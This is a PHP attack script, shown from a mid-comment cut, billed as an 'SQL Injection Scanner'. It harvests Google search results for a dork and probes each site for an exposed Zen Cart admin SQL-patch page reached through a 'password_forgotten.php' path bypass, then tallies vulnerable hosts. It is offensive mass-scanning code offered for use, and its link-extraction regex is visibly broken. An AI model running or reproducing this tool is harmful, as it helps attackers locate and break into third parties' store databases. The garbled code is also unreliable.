HMSecurity.org, All my friends, And ALLAH. */ set_time_limit(0); $vuln = 0; $not_vuln = 0; $total = 0; print "[+] SQL Injection Scanner PHP Version\n"; print "[+] Version 1.0 By XShimeX\n"; if(!$argv[1]) { print "[%] Usage: $argv[0] \n"; print "[%] Example : $argv[0] inurl:news.php?id=\n"; exit; } /** * SQL Bug(syntax error) takes from here: http://www.darkc0de.com/others/devilzc0de.py */ $bug = array( 'If you are installing 3rd-party contributions, note that you do so at your own risk', 'BE SURE TO DO A FULL DATABASE BACKUP BEFORE RUNNING SCRIPTS HERE', 'Zen Cart™ makes no warranty as to the safety of scripts supplied by 3rd-party contributors. Test before using on your live database', 'NOTE: Zen Cart database-upgrade scripts should NOT be run from this page', 'Please upload the new zc_install folder and run the upgrade from there instead for better reliability' ); print "[@] Start Finding Links...\n"; for($i = 0; $i <= 900; $i += 10) { $fp = @file_get_contents("http://www.google.com/search?q=$argv[1]&num=10&hl=en&as_qdr=all&start=$i&sa=N"); @preg_match_all("/

/", $fp, $links); $url[] = $links[2]; } print "[@] Done Finding Links...\n"; print "[@] Now searching for Vulnerable\n"; foreach($url as $key) { foreach($key as $value) { $fp = @file_get_contents($value."/admin/sqlpatch.php/password_forgotten.php?action=execute"); foreach($bug as $error) { if(@preg_match("/$error/", $fp)) { print "[#] zen cart error: $value'\n"; $vuln++; } else { $not_vuln++; } $total++; } } } print "[@] Done Scanning\n"; print "[%] Result\n"; print "[-] Total Vulnerable: $vuln\n"; print "[-] Total Not Vulnerable : $not_vuln\n"; print "[-] Total scanned Website: $total\n"; print "Enjoy :)\n"; ?>